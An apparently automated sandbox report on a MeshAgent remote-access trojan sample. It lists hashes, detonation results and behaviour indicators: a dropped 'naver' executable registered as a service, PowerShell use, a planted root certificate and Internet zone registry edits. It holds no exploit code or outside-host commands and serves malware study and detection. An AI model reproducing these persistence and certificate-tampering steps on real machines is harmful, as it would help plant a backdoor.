Malware Analysis Report

2024-10-23 20:21

Sample ID 240924-nk1f4swfma
Target 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch
SHA256 d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
Tags
meshagent backdoor discovery execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

Threat Level: Known bad

The file 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan

Detects MeshAgent payload

MeshAgent

Blocklisted process makes network request

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

Unsigned PE

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-24 11:28

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-24 11:28

Reported

2024-09-24 11:30

Platform

win7-20240903-en

Max time kernel

79s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-24 11:28

Reported

2024-09-24 11:30

Platform

win10v2004-20240802-en

Max time kernel

94s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

Signatures

Detects MeshAgent payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

MeshAgent

rat trojan backdoor meshagent

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Sets service image path in registry

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\dll\user32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\gdi32full.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\ncrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\shcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\gdi32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\shell32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\shell32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\comctl32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\DLL\dbgcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\bcryptprimitives.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\rpcrt4.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\msvcrt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dbghelp.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\DLL\bcrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\exe\MeshService64.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\gdi32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\gdi32full.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\ole32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\shcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\DLL\kernel32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\iphlpapi.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\gdiplus.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\ntdll.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\crypt32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\ucrtbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\user32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\ole32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\ncrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\ntdll.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\shcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\kernelbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\kernelbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\ws2_32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\advapi32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\sechost.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\gdiplus.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\1FEA0AE7DF9C1CE8F405F73E716F0906B8F38B20 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\MeshService64.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\rpcrt4.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\crypt32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\msvcrt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\comctl32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\DLL\iphlpapi.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\DLL\kernel32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\msvcp_win.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\sechost.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\dll\combase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\comctl32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
File opened for modification | C:\Windows\System32\bcrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716509109858256" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob value not present in this copy of the report] | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob value not present in this copy of the report] | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
